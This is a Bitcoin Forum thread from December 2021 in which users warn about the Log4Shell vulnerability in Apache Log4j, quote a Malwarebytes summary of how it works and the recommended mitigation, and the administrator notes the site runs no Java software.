Bitcoin Forum>Other>Meta
Author

Topic: Apache log4shell zeroday vulrerability (Read 147 times)

TheBeardedBaby
legendary
Activity: 2212
Merit: 3148
₿uy / $ell ..oeleo ;(
Apache log4shell zeroday vulrerability
December 17, 2021, 08:11:32 AM
#7
Quote from: theymos on December 14, 2021, 11:42:40 AM
I heard about this when it happened and at that time thought about the impact on bitcointalk.org, but AFAICT we were never affected, since we don't use any Java software (neither software we've written nor off-the-shelf software). Since the issue is so pervasive, it is conceivable that we could've been affected via a service provider or through some method that I haven't thought of, but I don't think so.

Clouldflare was the only service I could think of, but have fixed it.

@theymos, Please let me know where shall I share such breach/hack/bug info which can affect crypto users in a way? Which one is the most appropriate section. Until now I've mostly used the B&H as newbies are the ones that are most likely affected and have least protection (in general).
theymos
administrator
Activity: 5222
Merit: 13032
Re: Apache log4shell zeroday vulrerability
December 14, 2021, 11:42:40 AM
#6
I heard about this when it happened and at that time thought about the impact on bitcointalk.org, but AFAICT we were never affected, since we don't use any Java software (neither software we've written nor off-the-shelf software). Since the issue is so pervasive, it is conceivable that we could've been affected via a service provider or through some method that I haven't thought of, but I don't think so.
HI-TEC99
legendary
Activity: 2772
Merit: 2846
Re: Apache log4shell zeroday vulrerability
December 14, 2021, 06:16:26 AM
#5
Quote from: NeuroticFish on December 14, 2021, 06:05:40 AM
Quote from: HI-TEC99 on December 14, 2021, 05:59:57 AM
Thanks, did the mods move that thread to Off-Topic from here?

Somebody did. Yesterday that topic was (still) in Beginners and Help. (Clearly not the best place, I know.)

I'll leave this here, and the mods can delete it if they want. Maybe somebody might get alerted to the zero-day if they see it here.

NeuroticFish
legendary
Activity: 3668
Merit: 6382
Looking for campaign manager? Contact icopress!
Re: Apache log4shell zeroday vulrerability
December 14, 2021, 06:05:40 AM
#4
Quote from: HI-TEC99 on December 14, 2021, 05:59:57 AM
Thanks, did the mods move that thread to Off-Topic from here?

Somebody did. Yesterday that topic was (still) in Beginners and Help. (Clearly not the best place, I know.)
HI-TEC99
legendary
Activity: 2772
Merit: 2846
Re: Apache log4shell zeroday vulrerability
December 14, 2021, 05:59:57 AM
#3
Quote from: NeuroticFish on December 14, 2021, 05:55:41 AM
This was already posted 4 days ago: https://bitcointalksearch.org/topic/warning-log4shell-rce-0-day-exploit-found-in-log4j2this-is-gonna-be-huuuuge-5376340

And although I can understand that it's not related to bitcoin, the fact mods have buried that thread in Off-Topic looks a bit unfair. Probably that's also why you've missed it.

Thanks, did the mods move that thread to Off-Topic from here?
NeuroticFish
legendary
Activity: 3668
Merit: 6382
Looking for campaign manager? Contact icopress!
Re: Apache log4shell zeroday vulrerability
December 14, 2021, 05:55:41 AM
#2
This was already posted 4 days ago: https://bitcointalksearch.org/topic/warning-log4shell-rce-0-day-exploit-found-in-log4j2this-is-gonna-be-huuuuge-5376340

And although I can understand that it's not related to bitcoin, the fact mods have buried that thread in Off-Topic looks a bit unfair. Probably that's also why you've missed it.
HI-TEC99
legendary
Activity: 2772
Merit: 2846
Re: Apache log4shell zeroday vulrerability
December 14, 2021, 05:47:47 AM
#1
If this forum uses the apache Log4J logging tool it's vulnerable to the new Log4Shell critical zero-day vulnerability.

https://nvd.nist.gov/vuln/detail/CVE-2021-44228

Any system using it needs upgrading, or the mitigation applying.

https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/12/log4j-zero-day-log4shell-arrives-just-in-time-to-ruin-your-weekend/

Quote
All an attacker has to do is get the affected app to log a special string. For that reason, researchers have dubbed the vulnerability “Log4Shell”.

Log4j is an open source logging library written in Java that was developed by the Apache Software Foundation.

The vulnerability is triggered by a simple string sent to a vulnerable server:

[example string blocked by cloudflare]

When the vulnerable application logs the string it triggers a lookup to an attacker-controlled remote LDAP server (example.com in our scenario). The response from the malicious server contains a path to a remote Java class file that’s injected into the server process. Attackers can execute commands with the same level of privilege as the application that uses the logging library.

Quote
Mitigation

Mitigations are available for versions of log4j 2.10.0 and up. Version 2.15.0 is not vulnerable by default. Note that there may be other dependencies, such as your Java version, that need to be updated before you can upgrade. Fixing the vulnerability may not be straightforward, but it is urgent.

According to the Apache log4j project, if you are unable to upgrade, for whatever reason, you can mitigate this vulnerability in version 2.10.0 or higher by switching log4j2.formatMsgNoLookups to true. This can be done by adding ‐Dlog4j2.formatMsgNoLookups=True to the JVM command for starting the application.


Bitcoin Forum>Other>Meta
Jump to: